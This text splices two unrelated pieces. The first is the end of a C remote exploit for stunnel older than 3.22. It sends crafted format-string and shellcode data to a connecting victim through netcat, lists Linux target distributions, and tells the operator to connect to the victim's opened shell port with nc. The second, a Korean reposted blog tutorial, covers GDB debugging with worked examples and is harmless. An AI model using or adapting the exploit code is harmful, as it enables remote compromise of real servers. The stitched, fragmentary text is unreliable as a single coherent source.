unlink (sploitdata_filename);

strcpy(newstring, plat[type].format);

strcat(newstring, plat[type].shellcode);

write_sploit_data(newstring);

sprintf((char *) &str_port, "%d", port);

printf("[*] host: localhost\n");

printf("[*] port: %s\n", str_port); 

printf("[*] waiting: jackass should connect to our port\n");

printf("[*] next: after he connects press ctrl-c\n"); 

printf("[*] next: you should try to connect to his port 5074 - nc 1.2.3.4 5074\n"); 

pipe(fd);

if (( childpid=fork())==0) { /* cat is the child */

dup2(fd[1],STDOUT_FILENO);

close(fd[0]);

close(fd[1]);

execl("/bin/cat","cat",sploitdata_filename,NULL);

perror("The exec of cat failed");

} else { /* netcat is the parent */

dup2(fd[0], STDIN_FILENO);

close(fd[0]);

close(fd[1]);

execl("/usr/bin/nc", "nc", "-n", "-l", "-p", str_port, NULL);

perror("the exec of nc failed");

}

printf("[*] next: now you should try to connect to his port 5074\n"); 

exit(0);

}

void usage(char *argument)

{

fprintf(stdout,"Usage: %s -options arguments\n",argument);

fprintf(stdout,"Remote exploit for STUNNEL <3.22\n"

"by ^sq/w00nf - deltha [at] analog.ro\nUsage: %s [-p <port> -t <targettype>]\n"

"\t-p <port> - Local binded port where the remote stunnel connects\n"

"\t-t <target> - Target type number\n", argument);

fprintf(stdout,"\t-Target Type Number List-\n");

fprintf(stdout," {0} Red Hat Linux release 7.2 "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," {1} Red Hat Linux release 7.3 "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," {2} Red Hat Linux release 8.0 "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," {3} Mandrake Linux release 9.0 "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," {4} Slackware Linux release 8.1 "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," {5} Debian GNU release 3.0 "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," {6} Your custom distro "

" stunnel-3.20.tar.gz\n");

fprintf(stdout," Example1: %s -t 1 -p 252525\n",argument);

exit(0);

}

[출처 ]  http://blog.naver.com/endfirst?Redirect=Log&logNo=20003426603

링크를 다오려다가 복사해서 옵니다. 

GDB 사용하기

1.    GDB

GDB같은 디버거의 목적은 다른 프로그램 수행 중에 그 프로그램 ‘내부에서’ 무슨 일이 일어나고 있는지 보여주거나 프로그램이 잘못 실행되었을 때 무슨 일이 일어나고 있는지 보여주는것이다. GDB는C, C++, Modula-2로 짠 프로그램을 디버그 할 수 있다.

쉘에서 gdb로 GDB를 시작하면 quit로 종료명령을 주기전까지는 터미널로부터 명령라인을 읽어 들인다. help명령을 사용하여 gdb내부에서 도움말을 볼 수 있다.

디버깅을 하기 위해서는 –g옵션을 주고 컴파일/링크 해야 한다. 만약 링크가 libg.a를 찾을수 없다고 하면서 실패하게 되면, /usr/lib/ligb.a를 갖고 있지 않기 때문이다. 그 파일은 특별한 라이브러리로서 디버깅 가능 C라이브러리이다. libc 패키지에 포함되어 있거나 또는 libc소스 코드를 받아서 컴파일 하면 생긴다. /usr/lib/libc.a를 /usr/lib/libg.a로 링크 시켜도 된다.

l         코어파일 분석하기

코어파일은 충돌할 당시 프로세스의 메모리 이미지를 덤프한 것이다. 코어파일을 gdb와 함께사용하여 프로그램의 상태를 조사하고 실패 원인을 규명할 수 있다. 어떤 예기치 않은 일이발생하여 비정상적인 종료가 발생할 때 운영체계는 디스크에 코어 파일을 남긴다.메모리에 관한 문제는 Checker 패키지를 사용하여 예방할 수 있다. 하지만 메모리 fault를 일으키는 경우에는 충돌하면서 파일을 덤프한다. 코어파일은 일반적으로 프로세스를 실행시킨 현재 작업디렉토리에 생성되지만 프로그램 내에서 작업 디렉토리를 바꾸는 경우도 있다.

보통 리눅스는 부팅시에 코어 파일을 만들지 않도록 세팅되어 있다. 코어 파일 생성을 가능케하려고 한다면 그것을 다시 가능케 하는 셀의 내장 명령을 사용한다.

만약C쉘 호환 쉘(tcsh)을 쓰고 있다면 다음과 같이 명령을 내린다.

%  limit core unlimited

만약 본쉘류( sh , bash , zsh , pdksh )를 사용하고 있다면,

$  ulimit –c unlimited

와 같은 명령을 내린다.

코어파일을 함께 사용하기 위해선 다음과 같이 한다.

% gdb program core

l         실행 중인 프로그램 디버깅하기

gdb는 이미 실행중인 프로그램도 디버깅할 수 있게 해준다. 프로세스 실행을 가로채고 조사한 뒤 다시 원래 상태로 실행하도록 할 수 있다. attach명령을 사용하여 실행중인 프로세서에 gdb를 붙인다. attach 명령을 사용하기 위해서는 프로세스에 해당하는 실행 프로그램에허가권을 가지고 있어야 한다. 예를 들어 프로세스 ID 254번으로 실행 중인 pgmseq 프로그램이 있다면 다음과 같이 한다.

% gdb pgmseq

% attach 254

다음과 같이 해도 된다.

% gdb pgmseq 254

일단 gdb가 실행 중인 프로세스에 부착되면 프로그램을 일시 중지 시키고 gdb명령을 사용할수 있도록 제어권을 가져온다. break를 사용하여 중지점을 사용할 수 있고 중지점에 이를 때까지 실행하도록 continue 명령을 사용할 수 있다.

detach명령을 사용하여 gdb를 실행 중인 프로세스에서 떼어 낸다. 필요에 따라 다른 프로세스에 대하여 attach명령을 사용할 수 있다.

2.    gdb시작하기

% gdb                       - gdb를 먼저 실행 후file이라는 명령으로 program을 부른다.

% gdb  program          - 일반적인 방법이다.

% gdb  program  core  - 코어파일을 사용할 때 동시에 인자로 준다.

% gdb  program  1234  - 실행중인 프로세스를 디버그 하려면 프로세스 ID를 두 번째 인자로 주면 된다. 이 명령은 gdb를 (‘1234’ 란 이름의 파일이 없다면) 프로세스 1234에 접속시킨다.(gdb는 core파일을 먼저 찾는다.)

실행절차

%  gcc  –g  test.c  –o  test

%  gdb  test

이 명령을 실행하면 다음과 같은 메시지가 나타난다.

3.    많이 사용하는 GDB명령어

4.    gdb 해보기

예제1

% vi test.c

% gcc –g test.c –o test

% test

실행이 되지 않으면 mv test a.out으로 하여a.out을 실행시킨다. 실행을 시키면 원하는 답이 아니다. 그러면 gdb를 해보자.

% gdb a.out

(gdb) list        // list는 소스 내용을 10줄씩 보여준다.

1         #include <stdio.h>

2

3         main()

4         {

5         int i;

6         double j;

7         /*다음은i/2+i의 값을 출력하는 문이다.

8         i가1이면 j는1.5가 되어야 하지만 실제는 그렇지 않다.*/

9         ( i=0; i<5 ; i++){

j=i/2+i;

(gdb) b 9  // break 9 : for 문에 이상이 있다고 판단하여 line 9에 breakpoint를 잡는다.

Breakpoint 1 at 0x80483d6: file test.c, line 9.

(gdb) r     // run : breakpoint까지 실행된다.

Starting program: /home/pllab/chowing/gdb/a.out

Breakpoint 1, main () at test.c:9

9  for( i=0; i<5 ; i++){

(gdb) s                           // step : 한줄 실행시킨다.

j=i/2+i;

(gdb) s

11  printf(“j is %f \n”,j);

(gdb) p j         // print j : j의 값을 본다.

$2 = 0

(gdb) n

j is 0.000000

for( i=0; i<5 ; i++){

(gdb) display i

(gdb) display j

(gdb) n

11  printf(“j is %f \n”,j);

2: j = 1

1: i = 1

// 10 line에서 실행 후 i=1일 때, j=1이므로 10 line에서 잘못된 것을 알 수 있다.

// 10 line을 j = (double) i/2 + i; 로 고친다.

(gdb) quit

예제2

% vi hab.c

// 이 프로그램은 이상은 없다. 스택을 보기 위한 것이다.

// 여러 곳에서 호출되는 함수 안에서 충돌이 일어날 경우를 생각해 보자. 이 때는 함수가 어디로부터 호출되었는지 그리고 어떤 상황에서 충돌이 일어났는지 파악하고자 할 것이다.

backtrace (bt) 명령을 이용하면 충돌이 일어난 시점에서 프로그램의 현재 호출 스택(call stack) 상태를 볼 수 있다. 호출 스택은 현재 함수까지 이르는 호출 목록이다. 함수를 호출할때마다 보관된 레지스터 값, 함수 전달 인수, 지역 변수 등의 자료를 스택에 push한다. 이렇게 해서 각 함수들은 스택상에 일정 공간을 차지한다. 특정함수에 대하여 스택에서 사용되고있는 메로리 부분을 스택프레임(frame)이라 부르며 호출 스택은 이러한 스택 프레임을 순서대로 정렬한 목록이다.

% gdb hab

(gdb) b 10      Breakpoint 2 at 0x8048428: file hab.c, line 10.

(gdb) r

Starting program: /home/pllab/chowing/gdb/hab

정수a, b를 입력하시오3 4

breakpoint 2, main () at hab.c:10

10       dab = hab(a,b);

(gdb) bt         // 현재 스택에 main이 있다.

#0  main () at hab.c:10

(gdb) s

hab (x=3, y=4) at hab.c:15

15          return (x + y);

(gdb) bt         // 지금은 스택에 hab이 있다.

#0  hab (x=3, y=4) at hab.c:15

#1  0x8048435 in main () at hab.c:10

(gdb) frame 0 // hab의 상태를 점검하기 위해서 스택 프레임0번으로 이동

#0  hab (x=3, y=4) at hab.c:15

15          return (x + y);

(gdb) up           // hab이 어떻게 호출되었는가를 보기 위하여 상위 스택프레임으로 이동

#1  0x8048435 in main () at hab.c:10